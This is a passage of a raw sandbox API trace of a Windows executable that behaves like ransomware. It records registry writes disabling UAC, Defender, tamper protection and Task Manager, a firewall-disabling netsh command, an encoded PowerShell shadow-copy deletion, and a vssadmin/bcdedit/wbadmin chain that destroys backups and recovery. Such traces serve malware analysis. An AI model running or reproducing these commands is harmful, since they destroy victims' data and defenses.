out: lpsz="false") returned 0x5 [0098.728] CharUpperBuffW (in: lpsz="False", cchLength=0x5 | out: lpsz="FALSE") returned 0x5 [0098.728] VarBstrFromBool (in: boolIn=1, lcid=0x400, dwFlags=0x0, pbstrOut=0x19fd18 | out: pbstrOut=0x19fd18*="True") returned 0x0 [0098.729] CharLowerBuffW (in: lpsz="True", cchLength=0x4 | out: lpsz="true") returned 0x4 [0098.729] CharUpperBuffW (in: lpsz="True", cchLength=0x4 | out: lpsz="TRUE") returned 0x4 [0098.731] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1e8 [0098.731] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1ec [0098.731] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f0 [0098.736] LoadStringW (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid time Offset string: %s") returned 0x1e [0098.736] LoadStringW (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid time string: %s") returned 0x17 [0098.736] LoadStringW (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid date string: %s") returned 0x17 [0098.737] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x249f4ec, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0098.737] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeConditionVariable") returned 0x779d3a00 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x2498244, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0098.737] GetProcAddress (hModule=0x772d0000, lpProcName="WakeConditionVariable") returned 0x77a48c50 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x249f4ec, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0098.737] GetProcAddress (hModule=0x772d0000, lpProcName="WakeAllConditionVariable") returned 0x779d8a90 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x249f4ec, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0098.737] GetProcAddress (hModule=0x772d0000, lpProcName="SleepConditionVariableCS") returned 0x74d2fca0 [0098.738] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x772d0000 [0098.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x247a82c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileSizeEx", lpUsedDefaultChar=0x0) returned 13 [0098.738] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSizeEx") returned 0x7733ef40 [0098.739] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0098.739] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x2472e7c | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0098.740] GetACP () returned 0x4e4 [0098.741] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fccc | out: lpCPInfo=0x19fccc) returned 1 [0098.741] LoadStringW (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0098.741] LoadStringW (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0098.741] LoadStringW (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0098.741] LoadStringW (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0098.741] LoadStringW (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Disconnected.") returned 0xd [0098.741] LoadStringW (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Disconnecting.") returned 0xe [0098.742] LoadStringW (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Connected.") returned 0xa [0098.742] LoadStringW (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Connecting to %s.") returned 0x11 [0098.742] LoadStringW (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Resolving hostname %s.") returned 0x16 [0098.758] SetErrorMode (uMode=0x8000) returned 0x0 [0098.758] LoadLibraryW (lpLibFileName="security.dll") returned 0x46480000 [0098.764] SetErrorMode (uMode=0x0) returned 0x8000 [0098.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0098.764] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x24982e4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitSecurityInterfaceW", lpUsedDefaultChar=0x0) returned 22 [0098.764] GetProcAddress (hModule=0x46480000, lpProcName="InitSecurityInterfaceW") returned 0x74455db0 [0098.766] InitSecurityInterfaceW () returned 0x7445a1c0 [0098.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="NTLM", cchCount2=4) returned 2 [0098.768] GetConsoleWindow () returned 0x8002e [0098.786] ShowWindow (hWnd=0x8002e, nCmdShow=0) returned 0 [0098.786] FreeConsole () returned 1 [0098.786] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="OneCopyMutex") returned 0xa0 [0098.787] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x0) returned 0x0 [0098.787] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19fd3c, lpdwDisposition=0x19fd38 | out: phkResult=0x19fd3c*=0x9c, lpdwDisposition=0x19fd38*=0x2) returned 0x0 [0098.787] RegSetValueExW (in: hKey=0x9c, lpValueName="ConsentPromptBehaviorAdmin", Reserved=0x0, dwType=0x4, lpData=0x19fd48*=0x5, cbData=0x4 | out: lpData=0x19fd48*=0x5) returned 0x0 [0098.787] RegSetValueExW (in: hKey=0x9c, lpValueName="ConsentPromptBehaviorUser", Reserved=0x0, dwType=0x4, lpData=0x19fd48*=0x3, cbData=0x4 | out: lpData=0x19fd48*=0x3) returned 0x0 [0098.787] RegSetValueExW (in: hKey=0x9c, lpValueName="dontdisplaylastusername", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="EnableInstallerDetection", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="EnableLUA", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="EnableSecureUIAPaths", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="EnableUIADesktopToggle", Reserved=0x0, dwType=0x4, lpData=0x19fd48*=0x5, cbData=0x4 | out: lpData=0x19fd48*=0x5) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="EnableVirtualization", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="FilterAdministratorToken", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="legalnoticecaption", Reserved=0x0, dwType=0x1, lpData="", cbData=0x2 | out: lpData="") returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="legalnoticetext", Reserved=0x0, dwType=0x1, lpData="", cbData=0x2 | out: lpData="") returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="PromptOnSecureDesktop", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="scforceoption", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="shutdownwithoutlogon", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.788] RegSetValueExW (in: hKey=0x9c, lpValueName="undockwithoutlogon", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.789] RegSetValueExW (in: hKey=0x9c, lpValueName="ValidateAdminCodeSignatures", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0098.789] RegCloseKey (hKey=0x9c) returned 0x0 [0098.789] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19fd3c, lpdwDisposition=0x19fd38 | out: phkResult=0x19fd3c*=0x9c, lpdwDisposition=0x19fd38*=0x2) returned 0x0 [0098.789] RegSetValueExW (in: hKey=0x9c, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0098.789] RegCloseKey (hKey=0x9c) returned 0x0 [0098.789] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Features", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19fd3c, lpdwDisposition=0x19fd38 | out: phkResult=0x19fd3c*=0x9c, lpdwDisposition=0x19fd38*=0x1) returned 0x0 [0098.790] RegSetValueExW (in: hKey=0x9c, lpValueName="TamperProtection", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x0, cbData=0x4 | out: lpData=0x19fd44*=0x0) returned 0x0 [0098.790] RegCloseKey (hKey=0x9c) returned 0x0 [0098.790] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters="/C netsh firewall set opmode disable", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.276] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="powershell.exe", lpParameters="-e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.574] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters="/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.650] DeleteFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\host" (normalized: "c:\\windows\\system32\\drivers\\etc\\host")) returned 0 [0101.651] GetLastError () returned 0x2 [0101.651] GetFileAttributesW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\host" (normalized: "c:\\windows\\system32\\drivers\\etc\\host")) returned 0xffffffff [0101.651] SetLastError (dwErrCode=0x2) [0101.652] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\host" (normalized: "c:\\windows\\system32\\drivers\\etc\\host"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0101.652] GetFileType (hFile=0x2a0) returned 0x1 [0101.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="127.0.0.1 validation.sls.microsoft.com", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="127.0.0.1 validation.sls.microsoft.com", cchWideChar=38, lpMultiByteStr=0x24d1c94, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="127.0.0.1 validation.sls.microsoft.com", lpUsedDefaultChar=0x0) returned 38 [0101.652] WriteFile (in: hFile=0x2a0, lpBuffer=0x5afa7c*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x19fd34, lpOverlapped=0x0 | out: lpBuffer=0x5afa7c*, lpNumberOfBytesWritten=0x19fd34*=0x28, lpOverlapped=0x0) returned 1 [0101.654] CloseHandle (hObject=0x2a0) returned 1 [0101.656] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19fd3c, lpdwDisposition=0x19fd38 | out: phkResult=0x19fd3c*=0x2a0, lpdwDisposition=0x19fd38*=0x1) returned 0x0 [0101.656] RegSetValueExW (in: hKey=0x2a0, lpValueName="DisableTaskMgr", Reserved=0x0, dwType=0x4, lpData=0x19fd44*=0x1, cbData=0x4 | out: lpData=0x19fd44*=0x1) returned 0x0 [0101.656] RegCloseKey (hKey=0x2a0) returned 0x0 [0101.656] QueryPerformanceCounter (in: lpPerformanceCount=0x19fd08 | out: lpPerformanceCount=0x19fd08*=19741182403) returned 1 [0101.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x24983ac, cbMultiByte=16, lpWideCharStr=0x19ed04, cchWideChar=2047 | out: lpWideCharStr="0123456789ABCDEF펝瞜\x19\x19푀瞜\x19\x04") returned 16 [0101.657] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x19fcb8 | out: lpCPInfo=0x19fcb8) returned 1 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7BD05D2D5C7E0A84F53BB86E3D636CA837DE85711E1225BC279F01DCC0144253B1AA6F27067648FEA5F62CE76664A0937099F5890F48330B5625875DD56F7549307372627E48504B73B2815CEE2B1D1E000613C9BB6C725F5BC59A91E1EA5CA227510459C6A7F75FA32E25F80B08AF7B216664F88049D498644BB5EC561EFCF9FC9B73EF85BB6932BE21BE1969BF947F801982F22F41AD183585A6B7DABA9F0D57BDD32975BC023F72B31361C90850E4F1D79AF75CC96344A4C78FEF57DEC1E143881B50755C65F8F05372B83E4D78F56888AD794F89D4E6ED998863F9B163DCE1109703E86C67605C903B27FFA01915514D4221476EFEDD50B4397934DD7B5AB4BE062324F3228F3142013E98F431F849A720FA02B9F67B8E1A6399BC0F504876FD1CB5045B05B14B90DE6EF90163780", cchWideChar=609, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 609 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7BD05D2D5C7E0A84F53BB86E3D636CA837DE85711E1225BC279F01DCC0144253B1AA6F27067648FEA5F62CE76664A0937099F5890F48330B5625875DD56F7549307372627E48504B73B2815CEE2B1D1E000613C9BB6C725F5BC59A91E1EA5CA227510459C6A7F75FA32E25F80B08AF7B216664F88049D498644BB5EC561EFCF9FC9B73EF85BB6932BE21BE1969BF947F801982F22F41AD183585A6B7DABA9F0D57BDD32975BC023F72B31361C90850E4F1D79AF75CC96344A4C78FEF57DEC1E143881B50755C65F8F05372B83E4D78F56888AD794F89D4E6ED998863F9B163DCE1109703E86C67605C903B27FFA01915514D4221476EFEDD50B4397934DD7B5AB4BE062324F3228F3142013E98F431F849A720FA02B9F67B8E1A6399BC0F504876FD1CB5045B05B14B90DE6EF90163780", cchWideChar=609, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 609 [0101.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7BD05D2D5C7E0A84F53BB86E3D636CA837DE85711E1225BC279F01DCC0144253B1AA6F27067648FEA5F62CE76664A0937099F5890F48330B5625875DD56F7549307372627E48504B73B2815CEE2B1D1E000613C9BB6C725F5BC59A91E1EA5CA227510459C6A7F75FA32E25F80B08AF7B216664F88049D498644BB5EC561EFCF9FC9B73EF85BB6932BE21BE1969BF947F801982F22F41AD183585A6B7DABA9F0D57BDD32975BC023F72B31361C90850E4F1D79AF75CC96344A4C78FEF57DEC1E143881B50755C65F8F05372B83E4D78F56888AD794F89D4E6ED998863F9B163DCE1109703E86C67605C903B27FFA01915514D4221476EFEDD50B4397934DD7B5AB4BE062324F3228F3142013E98F431F849A720FA02B9F67B8E1A6399BC0F504876FD1CB5045B05B14B90DE6EF90163780", cchWideChar=609, lpMultiByteStr=0x245d4e8, cbMultiByte=609, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7BD05D2D5C7E0A84F53BB86E3D636CA837DE85711E1225BC279F01DCC0144253B1AA6F27067648FEA5F62CE76664A0937099F5890F48330B5625875DD56F7549307372627E48504B73B2815CEE2B1D1E000613C9BB6C725F5BC59A91E1EA5CA227510459C6A7F75FA32E25F80B08AF7B216664F88049D498644BB5EC561EFCF9FC9B73EF85BB6932BE21BE1969BF947F801982F22F41AD183585A6B7DABA9F0D57BDD32975BC023F72B31361C90850E4F1D79AF75CC96344A4C78FEF57DEC1E143881B50755C65F8F05372B83E4D78F56888AD794F89D4E6ED998863F9B163DCE1109703E86C67605C903B27FFA01915514D4221476EFEDD50B4397934DD7B5AB4BE062324F3228F3142013E98F431F849A720FA02B9F67B8E1A6399BC0F504876FD1CB5045B05B14B90DE6EF90163780", lpUsedDefaultChar=0x0) returned 609 [0101.658] GetCurrentThreadId () returned 0x1358 [0101.658] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] QueryPerformanceCounter (in: lpPerformanceCount=0x19fd08 | out: lpPerformanceCount=0x19fd08*=19741455045) returned 1 [0101.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x24983ac, cbMultiByte=16, lpWideCharStr=0x19ed04, cchWideChar=2047 | out: lpWideCharStr="0123456789ABCDEF펝瞜\x19\x19푀瞜\x19\x04") returned 16 [0101.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D4BFB50B504162577767AE06CC17743A49FD922E33A3976C2BD0115785F1DA4CE87FEC21D01B1C06F2BA53794CE3E66346685BAB261C87D16F97AF16CD49C00F4D0289A248841D7760C2CA4DD6DE50BA736198034783DFDA7A8EAAFF47BD4B18C76EDF2D28B79DF9BD026D80EF8F020AC1D8C913001DF30F803F953A922EE37C8289587905114932171DCAC632E2BA95841F81B94F619610EC6B1983A3934197EBE0C0CEE736DE17F3DEB483BC472EEF247AB749072CA30E0914328B7164840784033A6BDB0D62C6169150D3BDF076927CC6762A7F50484EC9A01066672FC08033C6EBFF31AF3DAE4B96E9D38BB50FBA7CFF3E274130E62B409C386C05A69B3732415B62DE7BD843D394FD07F1737968495781312A553392B8A7411B4DFE9F88DED047BA791405BD1E847EF3FA789A109", cchWideChar=609, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 609 [0101.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D4BFB50B504162577767AE06CC17743A49FD922E33A3976C2BD0115785F1DA4CE87FEC21D01B1C06F2BA53794CE3E66346685BAB261C87D16F97AF16CD49C00F4D0289A248841D7760C2CA4DD6DE50BA736198034783DFDA7A8EAAFF47BD4B18C76EDF2D28B79DF9BD026D80EF8F020AC1D8C913001DF30F803F953A922EE37C8289587905114932171DCAC632E2BA95841F81B94F619610EC6B1983A3934197EBE0C0CEE736DE17F3DEB483BC472EEF247AB749072CA30E0914328B7164840784033A6BDB0D62C6169150D3BDF076927CC6762A7F50484EC9A01066672FC08033C6EBFF31AF3DAE4B96E9D38BB50FBA7CFF3E274130E62B409C386C05A69B3732415B62DE7BD843D394FD07F1737968495781312A553392B8A7411B4DFE9F88DED047BA791405BD1E847EF3FA789A109", cchWideChar=609, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 609 [0101.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D4BFB50B504162577767AE06CC17743A49FD922E33A3976C2BD0115785F1DA4CE87FEC21D01B1C06F2BA53794CE3E66346685BAB261C87D16F97AF16CD49C00F4D0289A248841D7760C2CA4DD6DE50BA736198034783DFDA7A8EAAFF47BD4B18C76EDF2D28B79DF9BD026D80EF8F020AC1D8C913001DF30F803F953A922EE37C8289587905114932171DCAC632E2BA95841F81B94F619610EC6B1983A3934197EBE0C0CEE736DE17F3DEB483BC472EEF247AB749072CA30E0914328B7164840784033A6BDB0D62C6169150D3BDF076927CC6762A7F50484EC9A01066672FC08033C6EBFF31AF3DAE4B96E9D38BB50FBA7CFF3E274130E62B409C386C05A69B3732415B62DE7BD843D394FD07F1737968495781312A553392B8A7411B4DFE9F88DED047BA791405BD1E847EF3FA789A109", cchWideChar=609, lpMultiByteStr=0x245d4e8, cbMultiByte=609, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D4BFB50B504162577767AE06CC17743A49FD922E33A3976C2BD0115785F1DA4CE87FEC21D01B1C06F2BA53794CE3E66346685BAB261C87D16F97AF16CD49C00F4D0289A248841D7760C2CA4DD6DE50BA736198034783DFDA7A8EAAFF47BD4B18C76EDF2D28B79DF9BD026D80EF8F020AC1D8C913001DF30F803F953A922EE37C8289587905114932171DCAC632E2BA95841F81B94F619610EC6B1983A3934197EBE0C0CEE736DE17F3DEB483BC472EEF247AB749072CA30E0914328B7164840784033A6BDB0D62C6169150D3BDF076927CC6762A7F50484EC9A01066672FC08033C6EBFF31AF3DAE4B96E9D38BB50FBA7CFF3E274130E62B409C386C05A69B3732415B62DE7BD843D394FD07F1737968495781312A553392B8A7411B4DFE9F88DED047BA791405BD1E847EF3FA789A109jE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw4", lpUsedDefaultChar=0x0) returned 609 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] GetCurrentThreadId () returned 0x1358 [0101.659] QueryPerformanceCounter (in: lpPerformanceCount=0x19fd08 | out: lpPerformanceCount=0x19fd08*=19741522416) returned 1 [0101.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x24983ac, cbMultiByte=16, lpWideCharStr=0x19ed04, cchWideChar=2047 | out: lpWideCharStr="0123456789ABCDEF펝瞜\x19\x19푀瞜\x19\x04") returned 16 [0101.660] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0101.661] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0101.661] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0101.661] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0101.663] SetErrorMode (uMode=0x8000) returned 0x0 [0101.663] LoadLibraryW (lpLibFileName="WS2_32.DLL") returned 0x754f0000 [0101.667] SetErrorMode (uMode=0x0) returned 0x8000 [0101.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, 